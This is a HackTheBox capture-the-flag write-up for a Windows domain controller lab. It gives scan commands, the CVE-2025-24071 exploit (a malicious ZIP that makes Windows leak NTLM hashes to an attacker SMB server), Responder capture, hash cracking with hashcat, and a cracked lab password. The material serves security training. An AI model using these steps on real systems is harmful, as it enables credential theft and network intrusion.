NanoCorp - HackTheBox Writeup
Machine Information
- Name: NanoCorp
- OS: Windows Server 2022
- Difficulty: Hard
- IP: BOX_IP
Enumeration
Initial Nmap Scan
nmap -p- --min-rate 10000 BOX_IP
nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5986,9389 -sCV BOX_IP
Port Scan Results:
PORT STATE SERVICE VERSION
53/tcp open domain (generic dns response: SERVFAIL)
80/tcp open http Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
|_http-title: Did not follow redirect to http://nanocorp.htb/
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: nanocorp.htb)
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open globalcatLDAPssl
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (WinRM HTTPS)
9389/tcp open mc-nmf .NET Message Framing (ADWS)
Key Observations:
- This is a Domain Controller (DNS, LDAP, Kerberos, ADWS)
- Web server running on port 80 (Apache)
- WinRM available on port 5986 (HTTPS)
- Domain name:
nanocorp.htb
Web Enumeration
# Add to /etc/hosts
echo "BOX_IP dc01.nanocorp.htb nanocorp.htb" | sudo tee -a /etc/hosts
# Check main site
curl http://nanocorp.htb
whatweb http://nanocorp.htb
# Subdomain fuzzing with feroxbuster
feroxbuster -u http://BOX_IP \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt \
-H "Host: FUZZ.nanocorp.htb" \
--filter-status 404 \
-t 50 \
-o ferox-subdomains.txt
Discovered Subdomain:
hire.nanocorp.htb- Job application portal with file upload functionality
# Add subdomain to /etc/hosts
echo "BOX_IP hire.nanocorp.htb" | sudo tee -a /etc/hosts
Browsing to http://hire.nanocorp.htb reveals a job application form with resume/document upload capability.
Initial Foothold - CVE-2025-24071
Vulnerability Overview
CVE-2025-24071 is a Windows File Explorer vulnerability that causes NTLM hash leakage when a user extracts a ZIP archive containing a malicious .library-ms file. Windows Explorer automatically initiates an SMB authentication request to an attacker-controlled server without user interaction beyond extraction.
Reference: https://github.com/0x6rss/CVE-2025-24071_PoC
Exploitation
1. Generate malicious exploit ZIP:
# Clone the exploit repository
git clone https://github.com/0x6rss/CVE-2025-24071_PoC
cd CVE-2025-24071_PoC
# Generate exploit.zip with your attacking IP
python3 poc.py --ip 10.10.x.x --filename exploit --output-dir .
This creates exploit.zip containing a malicious .library-ms file that points to your SMB server.
2. Start Responder to capture NTLM hashes:
# Start Responder on tun0 interface
sudo responder -I tun0 -v
3. Upload the malicious ZIP:
- Navigate to
http://hire.nanocorp.htb - Use the job application form
- Upload
exploit.zipas a resume/document attachment - Submit the application
4. Wait for hash capture:
When an admin or HR personnel extracts the ZIP file, Windows automatically attempts to connect to your SMB server, and Responder captures the NTLMv2 hash.
[SMB] NTLMv2-SSP Client : BOX_IP
[SMB] NTLMv2-SSP Username : NANOCORP\web_svc
[SMB] NTLMv2-SSP Hash : web_svc::NANOCORP:...
5. Crack the hash with hashcat:
# Save the captured hash
echo 'web_svc::NANOCORP:...[captured_hash]...' > web_svc.hash
# Crack using hashcat with rockyou wordlist
hashcat -m 5600 web_svc.hash /usr/share/wordlists/rockyou.txt
# Alternatively, use john
john --wordlist=/usr/share/wordlists/rockyou.txt web_svc.hash
Cracked credentials: web_svc:dksehdgh712!@#
Credential Verification
# Verify credentials work
crackmapexec smb BOX_IP -u 'web_svc' -p 'dksehdgh712!@#'
# Check available shares
crackmapexec smb BOX_IP -u 'web_svc' -p 'dksehdgh712!@#' --shares